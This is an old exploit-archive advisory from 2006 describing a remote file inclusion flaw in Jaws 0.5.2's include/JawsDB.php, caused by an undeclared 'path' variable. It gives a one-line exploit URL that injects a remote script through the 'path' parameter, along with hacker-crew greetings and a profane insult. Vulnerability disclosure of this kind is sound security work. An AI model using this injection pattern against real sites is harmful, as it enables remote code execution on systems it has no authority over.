Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability
# Published : 2006-10-23
# Author : Drago84
# Previous Title : JumbaCMS 0.0.1 (includes/functions.php) Remote File Include Exploit
# Next Title : T.G.S. CMS <= 0.1.7 (logout.php) Remote SQL Injection Exploit

###### ToXiC #########################
#
# Jaws 0.5.2: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                    jaws 0.5.2
#
#
#  Sorce Code:
#             http://forge.novell.com/modules/xfcontent/private.php/jaws/jaws-0.5.2/jaws-0.5.2.tar.gz
#
#
# Page:                
#     JawsDB.php
#
# Problem:
#
#         GLOBALS["path"] not Declare
#
# Dir :
#      /html/include/
#
#
#
#
#
#
# ExPloit :
#   http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[Evil Script]
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# www.Syue.com [2006-10-23]